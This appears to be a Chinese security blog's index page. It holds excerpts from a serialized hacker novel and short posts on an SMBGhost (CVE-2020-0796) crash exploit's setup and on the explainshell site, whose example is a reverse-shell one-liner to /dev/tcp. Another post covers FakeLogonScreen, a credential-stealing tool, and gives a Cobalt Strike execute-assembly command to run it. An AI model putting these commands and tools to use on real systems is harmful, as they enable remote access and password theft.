原创小说《杀手》第七章 X计划

我们生活在一个由少数精英制定规则的世界里。他们左手握着权力,右手握着巨大的财富。他们背后拥有一个庞大的体系,权力与财富的相辅相成,控制了整个世界。我们生活在一个看似自由,实则处处受规则限制的世界。而黑客的存在的,就是寻求真正的自由来打破规则。实现突破,自由,平等,随意。

阅读全文 »

SMBGhost 蓝屏代码(测试成功)

CVE-2020-0796 蓝屏的代码。twitter上发现的。本地虚拟机,Windows10专业版1903测试成功.

使用方法:

安装impacket库

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python setup.py install

直接使用pip安装的不行,所以clone最新版本的,然后安装,在Mac系统下需要sudo权限。

安装成功后,下载该代码。执行如下命令:

阅读全文 »

原创小说《杀手》第六章 阴与阳 0与1 攻与防

自然界一切事物的运动,无一不是阴阳的对立统一。人的生命运动,其本身就是阴阳对立双方,在不断的矛盾运动中取得统一的过程。

夜深了,天气有些阴沉,有些发闷,让人感觉呼吸困难。路上还有几个刚刚下班的人往家里走,他们看上去有些疲惫,不时有几辆车呼啸而过。没过多久,狂风大作,电闪雷鸣,路边的树枝开始疯狂的摇头。很快无情的雨点从天空中落下,打在了正在赶路人的身上,人们纷纷拿着自己的包顶在头顶奔跑起来。这突如其来的一场大雨,拦住了深夜要赶回家的人,也惊醒了许多刚刚入睡的人们,还有那些害怕打雷无法入睡的人们。

风雨总是短暂的,下了一整夜的雨,清晨的空气变得清新起来,王梓伸了一个懒腰,然后拉开了窗帘,外面的阳光飞速的跑进屋内,填满整个卧室。打开窗,一股清爽的空气扑面而来,瞬间让人神清气爽。风雨过后总是会迎来美好,又或者给人们带来些许惊喜,比如雨后彩虹。

在这样一个美好的早晨,给人的心情也自然是不一样的,王梓准备下楼去公园转转。宅了许久,也应该出去呼吸一下外面的新鲜空气了。简单洗漱下,换了件宽松的衣服王梓救下楼了。

公园内都是些年纪较大的人,有的在空地上打羽毛球,有的老大爷站在树旁,不断用自己侧面的身体撞向树,然后弹回来,在撞过去,一会在用后背重复刚才的动作。有的老大妈则站在树下练习着嗓子。王梓心里想着当自己老了的时候是否也是差不多的样子,想想,自己摇摇头笑了。继续向前走,不远处可以看到有一群老年人,他们动作轻柔又缓慢,有的还穿着武术服,旁边有一个小音箱播放着音乐。在看最前面的那个人,大概60岁左右的样子,穿了一身黑色武术服,深深的眉毛,眼睛随着他的手移动着,他的动作圆活,连绵不绝,步伐轻盈如行云流水。王梓被这个老大爷吸引住了,觉得很帅气,便多看了会,心中感叹,原来太极拳是这样的优美。过了10多分钟结束了。老大爷走到旁边的凳子旁,从包里拿出一条毛巾来擦头上的汗。

“大爷,您打的拳简直太漂亮了。”王梓走上前去赞美起大爷。

“怎么,小伙子,你感兴趣?”大爷反问道。

“我是看您打,真的很美。吸引了我。” 王梓回复道。

“太极拳需要常年联系,对人身体有很大的益处,别人动作轻柔缓慢,但是,把每一个动作做到优雅,灵活,必须要要用力。你看我这么大年纪,身体一直很好,比起你们一些年轻人都要好呢。就说你们现在这些年轻人整天就知道对着电脑和手机,又爱熬夜,身体还不如我这个老头子呢。”

阅读全文 »

原创小说《杀手》第五章 恶作剧

黑客,月光下的魔术师。一个看似固若金汤,并投入了巨大的财力、人力、物力打造网络安全防护系统。每天有专人盯着,并可以随时触碰到。就是这样的系统,黑客往往也只会微微一笑,以你意想不到的方式去侵入你的系统。他们喜欢黑夜,他们在黑暗中默默的监视着你的一举一动。而你对此一无所知。

解雇

王梓在写着代码,旁边的两个同事在讨论。

同事小王先开口说道:“听说最近公司要裁员,咱们哥几个可得好好表现下,别被裁了,特殊时期可别往枪口上撞啊。”

“你这消息真的假的啊?”同事小张半信半疑地问道。

“这还能有假,其他几个部门已经有人被开除了。”

“那你是从哪里得到的消息啊?”

“另外一个部门的同事跟我说的,消息绝对可靠。没准啊,下一个就该我们部门喽~”

此时王梓部门的领导走了过来,旁边的两个人赶紧装作忙工作的样子。

“王梓,你到我办公室来一趟。”

王梓起身,朝领导办公室走去。旁边的两个同事面面相觑。小张先说话了:“你这乌鸦嘴,还真是,看来他这次要被开喽,他写的代码经常有bug(注解1:),有几次还是我给他调好的呢。平时就不爱说话,也不跟人交流,难怪技术那么差。”

“是啊,我也给他改过几次呢。咱们先准备准备,领导如果找咱们了,咱们跟领导求求情。”

“嗯,好。”

王梓来到领导办公室。

阅读全文 »

原创小说《杀手》第四章 网络灾难

暗流

暗潮涌动,当浮现出来的那一刻,必定是一场惊涛骇浪。50亿的信息泄漏已经够让人膛目结舌。似乎国内因为这一切变得平静,而在国际上,维基解密网站发布CIA使用的黑客工具包,一群网络中一名名为“影子”的组织劲爆出美国NSA使用的网络武器库。这个超级网络武器库对黑客们来说无疑是一场饕餮大餐。那黑夜中无数双眼睛变得无比的亮,各自忙碌着。

王梓看着这个超级武器库,内心大吃一惊,技术超前,覆盖全面,内容丰富。这注定是一个无眠的夜晚,王梓不断对其进行分析,并完善到自己的武器库中。

不止一次让王梓深深的感觉到人外有人,天外有天。单单靠他一个人不行,如今已不是个人英雄主义的时代。他需要伙伴,一起并肩作战的伙伴。就如网络武器库就是一支有精英队伍所打造出来的。而王梓就要建立一支这样的民间队伍。

太阳升起又落下,王梓站起身,伸了伸懒腰。看了下时间,晚上8点钟。正好可以下楼出去,顺便吃点东西。这个时候的晚上生活很是丰富。有穿着时尚又性感的美女在遛狗,有父母带着小孩子在散步的,有说有笑,而在不远处播放着最炫民族风,大妈们正在起劲的跳着广场舞,还有坐在小区椅子的大爷。王梓走在路上,徐徐的微风吹来,吹散了一脸的疲倦,顿时精神起来。

阅读全文 »

原创小说《杀手》第三章 追踪

Jack来到了天成网络公司的总部,他身穿一身白色衬衫,一条浅蓝色牛仔裤,整个人看上去非常的精神。到达后公司的人热情招待,但是Jack则直接拒绝了,要求立刻就要开始进行分析追踪。因为这对他来说,是一次有趣的挑战。他有些迫不及待是一个什么样的人干了这件事情。

首先询问了系统部人员的一些网络架构。以及现在企业内部所做的全防护措施。接着他有询问了更加具体的信息,其中包含了文件保存的位置,以及发生的时间点等。通过快速的对话沟通,Jack了解了对方的网络一个大概的安全状况。

他跟对方的技术负责人说道:“你们现在的网络情况相对来说做的非常不错,你们目前忽略了公司员工的安全意识,以及目前网络并没有对外流出数据进行一个很好的监控。这使的黑客有机可乘。”

“哎呦,您真的是太专业的,我们已经把我们所了解到的都利用上了,同时我们也经常找安全团队来对我们的系统进行入侵测试。然而他们并没有发现什么内容。发现的我们也都已经修复了。”系统部负责人拍了下大腿,高兴的对Jack说道。因为他似乎看到了希望,看到了眼前这个人可以查出入侵者,这样他也就不会被炒鱿鱼了。

“如果真的如你说的这般,这次的攻击者也是花了很大的代价来入侵你们,看来对方是真的下了血本,想置你们公司于死地啊。”放心,这次我一定要帮助你们找到真凶。他更加的想要知道究竟是什么样人了。

“能有您的加入,那真的是太好了,有什么需要帮助的,需要我们提供的,您就尽管说。我们一定全力配合您。”

“好,那我们废话不多说,开始吧。”

“好,小王,给Jack倒一杯咖啡。”

说着Jack找了个空位置,很不客气的就坐下了,从他的背包中拿出了自己的thinkpad笔记本。上面有一个blackhat的贴纸,看上去非常的酷。

阅读全文 »

原创小说《杀手》第二章 黑夜来临

生命的短暂犹如露珠消散,人们在奔波中探寻答案。命运如同大海起伏不定,键盘在黑夜中吟唱悲歌。

寂静的黑夜,人们的呼声飘荡在夜空中。

北京市朝阳区酒仙桥路阳光上东小区,在某间屋子里,一个人人正在神情专注的盯着电脑,不断的发出鼠标点击和敲击键盘的噼啪声,那声音清脆极了,犹如美妙的音符一般。

王梓正在探寻对方的公司内部网络,寻找着重要信息。看似平静的夜晚,而危险正在通过网络悄无声息的靠近。在未来的一个月内不知道会有多少人面临着失业,抑或者有人因此而自杀,也不知道多少病人因为药厂不能提供一些药物而加重病情,甚至死去。人们无法预测自己的未来和控制未来。杀手掌握着别人的未来,可是对于杀手抑或者网络杀手来说,他们自己的未来,也同样掌握在别人的手里。

人们还不知道危险就在自己的身边,人的生命有时候就是这样的脆弱。人们的命运都掌握在别人手里,在这大千世界面前我们都是弱者。即使强者也只是暂时的,不断变换着的。

王梓通过之前的几台员工电脑,很顺利的便控制了对方的crm(客户关系管理系统)、文件备份管理系统。此时的他正在准备获取到公司内部网络的最高管理权限(域控制权限)。黑色窗口,白色字符,不断闪现的流动的一串串字符。每一次的键盘敲击,都是在与目标靠近。

阅读全文 »

原创小说 《杀手》 第一章 网络杀手

杀手是在生活中受到雇主的雇佣,而去执行杀人任务,最终获得报酬。他们孤独,不轻易相信其他任何的人。他们非常冷酷,面对生命,他们从来不会手下留情。因为杀人就是她们的存在的意义。很少有人见过他们,因为大多数见过他们的人,都已经被杀死掉了。他们平时白天不出门,只有在夜里才开始行动,他们出去都会戴上墨镜,头顶一顶鸭舌帽,有时候以雾霾为由戴上口罩。其实,他们只是不想别人知道他们的真正面目。他们活在黑暗的世界里,不见天日。他们很可怜,没有爱情,没有亲情,甚至连个朋友都没有。

在网络的世界中也有这样的一种人,他们不杀人,他们也不需要在现实中隐藏包装自己,因为他们只存在于虚拟的网络世界中,很少有人知道他们的真面目。他们同样在夜间才进行活动,他们的任务是窃取企业,政府的最高机密信息。更准确的说,可以叫他们为网络间谍。他们是这个网络上的杀手,他们不会亲自杀人,却因为他们盗取的信息,有他们的买家来去做一些伤天害理的事情,使很多人因此而家破人亡。不过,对于这个世界来说,每个人都有着他自己的命运,弱者注定要被这个社会淘汰,而这个也正是杀手们所认同的,在杀手已活着网络杀手看来,他们可以杀死(入侵的目标)的人都是弱者。他们信奉他们自己可以改变或控制别人的命运,甚至大多数人的命运。

登场

“早~”,小楠对刚刚到公司的王梓打招呼。王梓则开心的笑笑,作为回应。

王梓是一家中日合资的中型软件公司的程序员。性格内向,腼腆。长相一般,在嘴巴的右上角有一颗痦子。在这家拥有数十位的程序员的公司,每个人都只负责各自的一部分,王梓在这里是其中普普通通的一员,公司部门内部竞争激烈,升职也比较困难,王梓不时还会犯些小错误,因为被领导破口大骂。对此王梓什么都不说,只在一旁听着,完事后继续回到座位上默默的工作。这时候,作为翻译的小楠总会过来安慰王梓。王梓也总说是他自己的错误。不怪领导发脾气。

阅读全文 »

分享个学习shell脚本或辅助理解的网站-explainshell.com

有的时候我们会遇到一些特别难理解的shell命令,或者是一些参数我们不知道它的作用。那么今天分享的这个网址可以帮助解决上面的烦恼。

网站主页打开后就是一个输入框。输入命令后,就会给出解析的结果。结果包含了解析的结果,并在下面给出了详细的说明。很方便。例如我们以bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 为例(如下图),很酷~

阅读全文 »

伪造windows登录屏幕窃取密码之FakeLogonScreen

在windows环境中,获取系统密码,提升系统权限。在渗透测试是经常遇到的。今天这里介绍一款伪造windows登录屏幕以达到窃取密码或题全的软件——FakeLogonScreen。

简介

FakeLogonScreen这个程序是用于伪造windows登录凭证以获取系统登录密码。它会获取当前系统配置的背景图片,这样显得更加真实,成功率也会更高。

另外,该程序会对输入的密码进行Active Directory或本地计算机的认证,以确保窃取密码的准确性。它可以显示在控制台,也可以保存早文件远程系统的硬盘上。

这个软件的好处就是可以与其它工具配合使用,可以直接通过内存执行(无文件)。比如可以配合Cobalt Strike的execute-assembly来执行。

运行环境

由于使用c#编写,需要系统中有.net framework框架。这里测试windows10和windows7,系统均为64位。在其release的版本中,作者给出来.net framework3.5和4.5的可执行程序。适用于windows7 和windows10等情况。实际中可根据实际情况进行选择。

利用

可以配合Cobalt Strike,系统上线后,进入到beacon中,然后直接执行execute-assembly /root/Desktop/FakeLogonScreen.exe 。(后面为控制机上的文件路径,非被控机的路径)。接下来就是等待对方输入密码,即可在进入的beacon中显示输入的密码了。效果图如下:

阅读全文 »